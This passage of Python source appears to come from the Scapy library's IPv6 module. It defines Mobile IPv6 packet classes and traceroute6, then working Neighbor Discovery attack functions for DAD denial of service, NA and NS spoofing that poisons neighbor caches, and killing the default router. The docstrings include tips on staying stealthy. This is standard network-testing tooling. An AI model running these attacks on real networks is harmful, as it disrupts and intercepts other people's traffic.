fields_desc = [ByteEnumField("otype", 14, _mobopttypes),
FieldLenField("olen", None, length_of="hkt", fmt="B"),
StrLenField("hkt", "",
length_from=lambda pkt: pkt.olen)]
x = 0
y = 0 # alignment requirement: none
class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4)
name = "MIPv6 option - Care-of Test Init"
fields_desc = [ByteEnumField("otype", 15, _mobopttypes),
ByteField("olen", 0)]
x = 0
y = 0 # alignment requirement: none
class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5)
name = "MIPv6 option - Care-of Test"
fields_desc = [ByteEnumField("otype", 16, _mobopttypes),
FieldLenField("olen", None, length_of="cokt", fmt="B"),
StrLenField("cokt", b'\x00' * 8,
length_from=lambda pkt: pkt.olen)]
x = 0
y = 0 # alignment requirement: none
class MIP6OptUnknown(_MIP6OptAlign):
name = 'Scapy6 - Unknown Mobility Option'
fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
FieldLenField("olen", None, length_of="odata", fmt="B"),
StrLenField("odata", "",
length_from=lambda pkt: pkt.olen)]
x = 0
y = 0 # alignment requirement: none
@classmethod
def dispatch_hook(cls, _pkt=None, *_, **kargs):
if _pkt:
o = orb(_pkt[0]) # Option type
if o in moboptcls:
return moboptcls[o]
return cls
moboptcls = {0: Pad1,
1: PadN,
2: MIP6OptBRAdvice,
3: MIP6OptAltCoA,
4: MIP6OptNonceIndices,
5: MIP6OptBindingAuthData,
6: MIP6OptMobNetPrefix,
7: MIP6OptLLAddr,
8: MIP6OptMNID,
9: MIP6OptMsgAuth,
10: MIP6OptReplayProtection,
11: MIP6OptCGAParamsReq,
12: MIP6OptCGAParams,
13: MIP6OptSignature,
14: MIP6OptHomeKeygenToken,
15: MIP6OptCareOfTestInit,
16: MIP6OptCareOfTest}
# Main Mobile IPv6 Classes
mhtypes = {0: 'BRR',
1: 'HoTI',
2: 'CoTI',
3: 'HoT',
4: 'CoT',
5: 'BU',
6: 'BA',
7: 'BE',
8: 'Fast BU',
9: 'Fast BA',
10: 'Fast NA'}
# From http://www.iana.org/assignments/mobility-parameters
bastatus = {0: 'Binding Update accepted',
1: 'Accepted but prefix discovery necessary',
128: 'Reason unspecified',
129: 'Administratively prohibited',
130: 'Insufficient resources',
131: 'Home registration not supported',
132: 'Not home subnet',
133: 'Not home agent for this mobile node',
134: 'Duplicate Address Detection failed',
135: 'Sequence number out of window',
136: 'Expired home nonce index',
137: 'Expired care-of nonce index',
138: 'Expired nonces',
139: 'Registration type change disallowed',
140: 'Mobile Router Operation not permitted',
141: 'Invalid Prefix',
142: 'Not Authorized for Prefix',
143: 'Forwarding Setup failed (prefixes missing)',
144: 'MIPV6-ID-MISMATCH',
145: 'MIPV6-MESG-ID-REQD',
146: 'MIPV6-AUTH-FAIL',
147: 'Permanent home keygen token unavailable',
148: 'CGA and signature verification failed',
149: 'Permanent home keygen token exists',
150: 'Non-null home nonce index expected'}
class _MobilityHeader(Packet):
name = 'Dummy IPv6 Mobility Header'
overload_fields = {IPv6: {"nh": 135}}
def post_build(self, p, pay):
p += pay
tmp_len = self.len
if self.len is None:
tmp_len = (len(p) - 8) // 8
p = p[:1] + struct.pack("B", tmp_len) + p[2:]
if self.cksum is None:
cksum = in6_chksum(135, self.underlayer, p)
else:
cksum = self.cksum
p = p[:4] + struct.pack("!H", cksum) + p[6:]
return p
class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
name = "IPv6 Mobility Header - Generic Message"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", None, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrLenField("msg", b"\x00" * 2,
length_from=lambda pkt: 8 * pkt.len - 6)]
class MIP6MH_BRR(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Refresh Request"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 0, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("res2", None),
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], MIP6OptUnknown, 8,
length_from=lambda pkt: 8 * pkt.len)]
overload_fields = {IPv6: {"nh": 135}}
def hashret(self):
# Hack: BRR, BU and BA have the same hashret that returns the same
# value b"\x00\x08\x09" (concatenation of mhtypes). This is
        # because we need to match BA with BU and BU with BRR. --arno
return b"\x00\x08\x09"
class MIP6MH_HoTI(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test Init"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 1, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrFixedLenField("reserved", b"\x00" * 2, 2),
StrFixedLenField("cookie", b"\x00" * 8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], MIP6OptUnknown, 16,
length_from=lambda pkt: 8 * (pkt.len - 1))]
overload_fields = {IPv6: {"nh": 135}}
def hashret(self):
return bytes_encode(self.cookie)
class MIP6MH_CoTI(MIP6MH_HoTI):
name = "IPv6 Mobility Header - Care-of Test Init"
mhtype = 2
def hashret(self):
return bytes_encode(self.cookie)
class MIP6MH_HoT(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 3, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("index", None),
StrFixedLenField("cookie", b"\x00" * 8, 8),
StrFixedLenField("token", b"\x00" * 8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], MIP6OptUnknown, 24,
length_from=lambda pkt: 8 * (pkt.len - 2))]
overload_fields = {IPv6: {"nh": 135}}
def hashret(self):
return bytes_encode(self.cookie)
def answers(self, other):
if (isinstance(other, MIP6MH_HoTI) and
self.cookie == other.cookie):
return 1
return 0
class MIP6MH_CoT(MIP6MH_HoT):
name = "IPv6 Mobility Header - Care-of Test"
mhtype = 4
def hashret(self):
return bytes_encode(self.cookie)
def answers(self, other):
if (isinstance(other, MIP6MH_CoTI) and
self.cookie == other.cookie):
return 1
return 0
class LifetimeField(ShortField):
def i2repr(self, pkt, x):
return "%d sec" % (4 * x)
class MIP6MH_BU(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Update"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
ByteEnumField("mhtype", 5, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
XShortField("seq", None), # TODO: ShortNonceField
FlagsField("flags", "KHA", 7, "PRMKLHA"),
XBitField("reserved", 0, 9),
LifetimeField("mhtime", 3), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], MIP6OptUnknown, 12,
length_from=lambda pkt: 8 * pkt.len - 4)]
overload_fields = {IPv6: {"nh": 135}}
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return b"\x00\x08\x09"
def answers(self, other):
if isinstance(other, MIP6MH_BRR):
return 1
return 0
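# Example (illustrative; the care-of address is a placeholder): a Binding
# Update carrying an Alternate Care-of Address option could be built as
#   >>> bu = IPv6() / MIP6MH_BU(flags="KHA", mhtime=100)
#   >>> bu /= MIP6OptAltCoA(acoa="2001:db8::2")
# Autopad (enabled by default) inserts the Pad1/PadN options needed to
# satisfy the option's 8n+6 alignment requirement.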
class MIP6MH_BA(_MobilityHeader):
name = "IPv6 Mobility Header - Binding ACK"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
ByteEnumField("mhtype", 6, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ByteEnumField("status", 0, bastatus),
FlagsField("flags", "K", 3, "PRK"),
XBitField("res2", None, 5),
XShortField("seq", None), # TODO: ShortNonceField
XShortField("mhtime", 0), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], MIP6OptUnknown, 12,
length_from=lambda pkt: 8 * pkt.len - 4)]
overload_fields = {IPv6: {"nh": 135}}
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return b"\x00\x08\x09"
def answers(self, other):
if (isinstance(other, MIP6MH_BU) and
other.mhtype == 5 and
self.mhtype == 6 and
                other.flags & 0x1 and  # Ack request flag is set
self.seq == other.seq):
return 1
return 0
_bestatus = {1: 'Unknown binding for Home Address destination option',
2: 'Unrecognized MH Type value'}
# TODO: match Binding Error to its stimulus
class MIP6MH_BE(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Error"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
ByteEnumField("mhtype", 7, mhtypes),
ByteField("res", 0),
XShortField("cksum", None),
ByteEnumField("status", 0, _bestatus),
ByteField("reserved", 0),
IP6Field("ha", "::"),
_OptionsField("options", [], MIP6OptUnknown, 24,
length_from=lambda pkt: 8 * (pkt.len - 2))]
overload_fields = {IPv6: {"nh": 135}}
_mip6_mhtype2cls = {0: MIP6MH_BRR,
1: MIP6MH_HoTI,
2: MIP6MH_CoTI,
3: MIP6MH_HoT,
4: MIP6MH_CoT,
5: MIP6MH_BU,
6: MIP6MH_BA,
7: MIP6MH_BE}
#############################################################################
#############################################################################
# Traceroute6 #
#############################################################################
#############################################################################
class AS_resolver6(AS_resolver_riswhois):
def _resolve_one(self, ip):
"""
overloaded version to provide a Whois resolution on the
embedded IPv4 address if the address is 6to4 or Teredo.
Otherwise, the native IPv6 address is passed.
"""
if in6_isaddr6to4(ip): # for 6to4, use embedded @
tmp = inet_pton(socket.AF_INET6, ip)
addr = inet_ntop(socket.AF_INET, tmp[2:6])
elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
addr = teredoAddrExtractInfo(ip)[2]
else:
addr = ip
_, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
if asn.startswith("AS"):
try:
asn = int(asn[2:])
except ValueError:
pass
return ip, asn, desc
class TracerouteResult6(TracerouteResult):
__slots__ = []
def show(self):
return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501
s.hlim,
r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501
"{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501
"{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501
"{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501
def get_trace(self):
trace = {}
for s, r in self.res:
if IPv6 not in s:
continue
d = s[IPv6].dst
if d not in trace:
trace[d] = {}
t = not (ICMPv6TimeExceeded in r or
ICMPv6DestUnreach in r or
ICMPv6PacketTooBig in r or
ICMPv6ParamProblem in r)
trace[d][s[IPv6].hlim] = r[IPv6].src, t
for k in six.itervalues(trace):
try:
m = min(x for x, y in six.iteritems(k) if y[1])
except ValueError:
continue
for li in list(k): # use list(): k is modified in the loop
if li > m:
del k[li]
return trace
def graph(self, ASres=AS_resolver6(), **kargs):
TracerouteResult.graph(self, ASres=ASres, **kargs)
@conf.commands.register
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
l4=None, timeout=2, verbose=None, **kargs):
"""Instant TCP traceroute using IPv6
    traceroute6(target, [maxttl=30], [dport=80], [sport=RandShort()])
        -> (TracerouteResult6 instance, list of unanswered packets)
"""
if verbose is None:
verbose = conf.verb
if l4 is None:
a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501
timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501
else:
a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4,
timeout=timeout, verbose=verbose, **kargs)
a = TracerouteResult6(a.res)
if verbose:
a.show()
return a, b
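# Example usage (illustrative; the hostname is a placeholder):
#   >>> res, unans = traceroute6("www.example.com", dport=443)
#   >>> trace = res.get_trace()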
#############################################################################
#############################################################################
# Sockets #
#############################################################################
#############################################################################
class L3RawSocket6(L3RawSocket):
def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501
# NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501
self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501
self.iface = iface
def IPv6inIP(dst='203.178.135.36', src=None):
_IPv6inIP.dst = dst
_IPv6inIP.src = src
if not conf.L3socket == _IPv6inIP:
_IPv6inIP.cls = conf.L3socket
else:
del(conf.L3socket)
return _IPv6inIP
class _IPv6inIP(SuperSocket):
dst = '127.0.0.1'
src = None
cls = None
def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501
SuperSocket.__init__(self, family, type, proto)
self.worker = self.cls(**args)
def set(self, dst, src=None):
_IPv6inIP.src = src
_IPv6inIP.dst = dst
def nonblock_recv(self):
p = self.worker.nonblock_recv()
return self._recv(p)
def recv(self, x):
p = self.worker.recv(x)
return self._recv(p, x)
def _recv(self, p, x=MTU):
if p is None:
return p
elif isinstance(p, IP):
# TODO: verify checksum
if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
if isinstance(p.payload, IPv6):
return p.payload
return p
def send(self, x):
return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501
#############################################################################
#############################################################################
# Neighbor Discovery Protocol Attacks #
#############################################################################
#############################################################################
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
tgt_filter=None, reply_mac=None):
"""
Internal generic helper accepting a specific callback as first argument,
for NS or NA reply. See the two specific functions below.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
# Get and compare the MAC address
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must be the unspecified address
if req[IPv6].src != "::":
return 0
# Check destination is the link-local solicited-node multicast
# address associated with target address in received NS
tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
return 0
return 1
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, iface),
iface=iface)
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
    3756. This is done by listening for incoming NS messages sent from the
    unspecified address and sending an NS reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NS sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the unspecified address (::).
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
"""
def ns_reply_callback(req, reply_mac, iface):
"""
        Callback that replies to an NS by sending a similar NS
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501
sendp(rep, iface=iface, verbose=0)
print("Reply NS for target address %s (received from %s)" % (tgt, mac))
_NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
    Perform the DAD DoS attack using NA described in section 4.1.3 of RFC
    3756. This is done by listening for incoming NS messages *sent from the
    unspecified address* and sending an NA reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address found in received NS.
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
"""
def na_reply_callback(req, reply_mac, iface):
"""
        Callback that replies to an NS with an NA
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst)
rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
_NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None, router=False):
"""
The main purpose of this function is to send fake Neighbor Advertisement
    messages to a victim. As the emission of unsolicited Neighbor
    Advertisements is pretty pointless (from an attacker standpoint) because
    it will not lead to a modification of a victim's neighbor cache, the
    function sends advertisements in response to received NS (NS sent as
    part of DAD, i.e. with the unspecified address as source, are not
    considered).
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address
- as IPv6 destination address: the source IPv6 address of received NS
message.
- the mac address of the interface as source (or reply_mac, see below).
    - the source mac address of the received NS as destination mac address
of the emitted NA.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
filled with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
    router: by default (False) the 'R' flag in the NA used for the reply
is not set. If the parameter is set to True, the 'R' flag in the
NA is set, advertising us as a router.
Please, keep the following in mind when using the function: for obvious
reasons (kernel space vs. Python speed), when the target of the address
resolution is on the link, the sender of the NS receives 2 NA messages
in a row, the valid one and our fake one. The second one will overwrite
the information provided by the first one, i.e. the natural latency of
Scapy helps here.
In practice, on a common Ethernet link, the emission of the NA from the
genuine target (kernel stack) usually occurs in the same millisecond as
    the receipt of the NS. The NA generated by Scapy6 will usually come some
    20+ ms later. On a usual testbed, for instance, this difference is
sufficient to have the first data packet sent from the victim to the
destination before it even receives our fake NA.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must NOT be the unspecified address
if req[IPv6].src == "::":
return 0
tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
dst = req[IPv6].dst
if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
# If this is a real address resolution NS, then the destination
# address of the packet is the link-local solicited node multicast
# address associated with the target of the NS.
# Otherwise, the NS is a NUD related one, i.e. the peer is
# unicasting the NS to check the target is still alive (L2
# information is still in its cache and it is verified)
received_snma = inet_pton(socket.AF_INET6, dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
print("solicited node multicast @ does not match target @!")
return 0
return 1
def reply_callback(req, reply_mac, router, iface):
"""
        Callback that replies to an NS with a spoofed NA
"""
# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
# send it back.
mac = req[Ether].src
pkt = req[IPv6]
src = pkt.src
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
# Use the target field from the NS
rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741
# "If the solicitation IP Destination Address is not a multicast
# address, the Target Link-Layer Address option MAY be omitted"
# Given our purpose, we always include it.
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
router = 1 if router else 0 # Value of the R flags in NA
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, router, iface),
iface=iface)
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
dst=None, src_mac=None, dst_mac=None, loop=True,
inter=1, iface=None):
"""
The main purpose of this function is to send fake Neighbor Solicitations
messages to a victim, in order to either create a new entry in its neighbor
cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
that a node SHOULD create the entry or update an existing one (if it is not
currently performing DAD for the target of the NS). The entry's reachability # noqa: E501
state is set to STALE.
The two main parameters of the function are the source link-layer address
(carried by the Source Link-Layer Address option in the NS) and the
source address of the packet.
    Unlike some other NDP_Attack_* functions, this one is not based on a
    stimulus/response model. When called, it sends the same NS packet in a
    loop every 'inter' seconds (one second by default).
Following arguments can be used to change the format of the packets:
src_lladdr: the MAC address used in the Source Link-Layer Address option
included in the NS packet. This is the address that the peer should
associate in its neighbor cache with the IPv6 source address of the
packet. If None is provided, the mac address of the interface is
used.
src: the IPv6 address used as source of the packet. If None is provided,
an address associated with the emitting interface will be used
(based on the destination address of the packet).
target: the target address of the NS packet. If no value is provided,
a dummy address (2001:db8::1) is used. The value of the target
has a direct impact on the destination address of the packet if it
is not overridden. By default, the solicited-node multicast address
associated with the target is used as destination address of the
packet. Consider specifying a specific destination address if you
intend to use a target address different than the one of the victim.
dst: The destination address of the NS. By default, the solicited node
multicast address associated with the target address (see previous
parameter) is used if no specific value is provided. The victim
is not expected to check the destination address of the packet,
so using a multicast address like ff02::1 should work if you want
the attack to target all hosts on the link. On the contrary, if
you want to be more stealth, you should provide the target address
for this parameter in order for the packet to be sent only to the
victim.
src_mac: the MAC address used as source of the packet. By default, this
is the address of the interface. If you want to be more stealth,
feel free to use something else. Note that this address is not the
        one that the victim will use to populate its neighbor cache.
dst_mac: The MAC address used as destination address of the packet. If
the IPv6 destination address is multicast (all-nodes, solicited
node, ...), it will be computed. If the destination address is
unicast, a neighbor solicitation will be performed to get the
associated address. If you want the attack to be stealth, you
can provide the MAC address using this parameter.
loop: By default, this parameter is True, indicating that NS packets
will be sent in loop, separated by 'inter' seconds (see below).
When set to False, a single packet is sent.
inter: When loop parameter is True (the default), this parameter provides
the interval in seconds used for sending NS packets.
iface: to force the sending interface.
"""
if not iface:
iface = conf.iface
# Use provided MAC address as source link-layer address option
# or the MAC address of the interface if none is provided.
if not src_lladdr:
src_lladdr = get_if_hwaddr(iface)
# Prepare packets parameters
ether_params = {}
if src_mac:
ether_params["src"] = src_mac
if dst_mac:
ether_params["dst"] = dst_mac
ipv6_params = {}
if src:
ipv6_params["src"] = src
if dst:
ipv6_params["dst"] = dst
else:
# Compute the solicited-node multicast address
# associated with the target address.
tmp = inet_ntop(socket.AF_INET6,
in6_getnsma(inet_pton(socket.AF_INET6, target)))
ipv6_params["dst"] = tmp
pkt = Ether(**ether_params)
pkt /= IPv6(**ipv6_params)
pkt /= ICMPv6ND_NS(tgt=target)
pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
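# Example usage (illustrative; all addresses are placeholders):
#   >>> NDP_Attack_NS_Spoofing(src="2001:db8::42", target="2001:db8::1",
#   ...                        dst="2001:db8::1", iface="eth0")
# This poisons the victim's (2001:db8::1) neighbor cache entry for
# 2001:db8::42 with the attacker's MAC address.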
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
ip_src_filter=None, reply_mac=None,
tgt_mac=None):
"""
The purpose of the function is to monitor incoming RA messages
sent by default routers (RA with a non-zero Router Lifetime values)
and invalidate them by immediately replying with fake RA messages
advertising a zero Router Lifetime value.
The result on receivers is that the router is immediately invalidated,
i.e. the associated entry is discarded from the default router list
and destination cache is updated to reflect the change.
By default, the function considers all RA messages with a non-zero
Router Lifetime value but provides configuration knobs to allow
filtering RA sent by specific routers (Ethernet source address).
With regard to emission, the multicast all-nodes address is used
by default but a specific target can be used, in order for the DoS to
apply only to a specific host.
More precisely, following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RA messages received from this source will trigger replies.
If other default routers advertised their presence on the link,
their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific mac address.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RA messages received from this source address will trigger
replies. If other default routers advertised their presence on the
link, their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific IPv6 source
address.
    reply_mac: allows specifying a specific source mac address for the reply,
       i.e. to prevent the use of the mac address of the interface.
    tgt_mac: allows limiting the effect of the DoS to a specific host,
       by sending the "invalidating RA" only to its mac address.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
# Check if this is an advertisement for a Default Router
# by looking at Router Lifetime value
if req[ICMPv6ND_RA].routerlifetime == 0:
return 0
return 1
def ra_reply_callback(req, reply_mac, tgt_mac, iface):
"""
Callback that sends an RA with a 0 lifetime
"""
# Let's build a reply and send it
src = req[IPv6].src
# Prepare packets parameters
ether_params = {}
if reply_mac:
ether_params["src"] = reply_mac
if tgt_mac:
ether_params["dst"] = tgt_mac
# Basis of fake RA (high pref, zero lifetime)
rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
        # Add the Prefix Information option(s) from the request ...
tmp = req
while ICMPv6NDOptPrefixInfo in tmp:
pio = tmp[ICMPv6NDOptPrefixInfo]
tmp = pio.payload
del(pio.payload)
rep /= pio
# ... and source link layer address option
if ICMPv6NDOptSrcLLAddr in req:
mac = req[ICMPv6NDOptSrcLLAddr].lladdr
else:
mac = req[Ether].src
rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
sendp(rep, iface=iface, verbose=0)
print("Fake RA sent with source address %s" % src)
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
iface=iface)
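# Hypothetical usage sketch (illustrative addresses): invalidate only the RAs
# sent by one specific router on eth0, replying from a spoofed source MAC:
#
#   NDP_Attack_Kill_Default_Router(iface="eth0",
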